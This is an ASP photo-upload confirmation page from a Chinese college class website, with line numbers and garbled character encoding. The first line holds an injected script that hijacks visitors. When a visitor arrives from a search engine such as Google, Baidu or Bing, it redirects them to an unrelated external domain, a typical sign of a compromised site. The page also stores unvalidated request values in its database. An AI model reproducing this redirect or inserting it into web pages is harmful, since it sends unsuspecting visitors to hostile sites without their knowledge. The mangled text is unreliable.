d:\wwwroot\wuchunhua\ͨѶ¼\photo\uploadnow2.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<!--#include file="chklogin.asp"-->
002:
<!--#include file="conn.asp"-->
003:
004:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
005:
"http://www.w3.org/TR/html4/loose.dtd">
006:
<html>
007:
<head>
008:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
009:
<link href="../css.css" rel="stylesheet" type="text/css">
010:
<title>ÆëÆë¹þ¶ûְҵѧԺ¼ÆÈí052--Ïà²á</title>
011:
<style type="text/css">
012:
<!--
013:
.style3 {font-size: 1pt;
014:
color: #FFFFFF;
015:
}
016:
.ziti {font-family: "ËÎÌå";
017:
font-size: 12px;
018:
font-weight: bold;
019:
color: #FFFFFF;
020:
}
021:
.ziti1 {font-size: 12px;
022:
font-weight: normal;
023:
color: #000000;
024:
}
025:
.ziti2 {font-family: "ËÎÌå";
026:
font-size: 12px;
027:
font-weight: bold;
028:
color: #FFFFFF;
029:
}
030:
.ziti2 { font-family: "ËÎÌå";
031:
font-size: 12px;
032:
font-weight: normal;
033:
color: #000000;
034:
}
035:
.style5 {
036:
color: #000000;
037:
font-size: 12px;
038:
}
039:
body {
040:
background-image: url('../pic/xian.jpg');
041:
}
042:
-->
043:
</style>
044:
<%
045:
dim rs
046:
dim sql
047:
set rs = server.createobject("adodb.recordset")
048:
sql="select * from photo"
049:
rs.open sql,conn,3,3
050:
rs.addnew
051:
rs("url")=request("imgurl")
052:
rs("name")=session("name")
053:
rs("time")=year(now) & "Äê" & month(now) & "ÔÂ" & day(now) & "ÈÕ"
054:
rs("say")=request("say")
055:
rs.update
056:
rs.close
057:
set rs=nothing
058:
conn.close
059:
set conn=nothing
060:
%
>
061:
062:
063:
</head>
064:
065:
<body>
066:
<table width="775" border="0" align="center" cellpadding="0" cellspacing="0">
067:
<tr>
068:
<th scope="col"><table width="775" border="0" cellspacing="0" cellpadding="0">
069:
<tr>
070:
<th scope="col">
071:
<img src="../pic/toplogo.jpg" width="775" height="80"></th>
072:
</tr>
073:
<tr>
074:
<td height="2"><span class="style3">1</span></td>
075:
</tr>
076:
<tr>
077:
<td height="20" background="../pic/tiao1.gif"><table width="775" border="0" cellpadding="0" cellspacing="0">
078:
<tr class="ziti">
079:
<th width="97" scope="col">Ê×Ò³</th>
080:
<th width="97" scope="col">Ïà²á</th>
081:
<th width="97" scope="col">ÁôÑÔ±¾</th>
082:
<th width="97" scope="col">ÐíÔ¸°å</th>
083:
<th width="97" scope="col">ÇÄÇÄ»°</th>
084:
<th width="97" scope="col">
085:
<a name="link1" id="link1" onMouseOver="MM_showMenu(window.mm_menu_1122195914_0,0,12,null,'link1')" onMouseOut="MM_startTimeout();" href="../zlx/zlx.asp">×ÊÁÏÏ»</a></th>
086:
<th width="97" scope="col">¹ÜÀí</th>
087:
<th width="97" scope="col">怫</th>
088:
</tr>
089:
</table></td>
090:
</tr>
091:
</table></th>
092:
</tr>
093:
<tr>
094:
<td height="180" align="center" valign="top"><table width="775" height="219" border="0" cellpadding="0" cellspacing="0">
095:
<tr>
096:
<th width="20" scope="col">¡¡</th>
097:
<th scope="col">¡¡<table width="735" height="224" border="0" cellpadding="0" cellspacing="0">
098:
<tr>
099:
<th height="184" scope="col" valign="top" class=ziti2>
100:
<br>
101:
<span style="font-size: 13pt"><br>
102:
ͼƬÉÏ´«³É¹¦£¡</span><p>
103:
<span style="font-size: 15pt"><a href="photo.asp">
104:
<span style="font-weight: 400"><font color="#FF0000">[·µ»ØÏà²áÊ×Ò³]</font></span></a></span></th>
105:
</tr>
106:
<tr>
107:
<td height="40">¡¡</td>
108:
</tr>
109:
</table></th>
110:
<th width="20" scope="col">¡¡</th>
111:
</tr>
112:
</table></td>
113:
</tr>
114:
<tr>
115:
<td height="20" valign="bottom">¡¡</td>
116:
</tr>
117:
<tr>
118:
<td height="33"><hr>
119:
<div align="center"><span class="ziti1">°æÈ¨ËùÓÐ © ÆëÆë¹þ¶ûְҵѧԺ¼ÆËã»úÈí¼þ052°à</span></div></td>
120:
</tr>
121:
</table>
122:
</body>
123:
</html>
124:
125: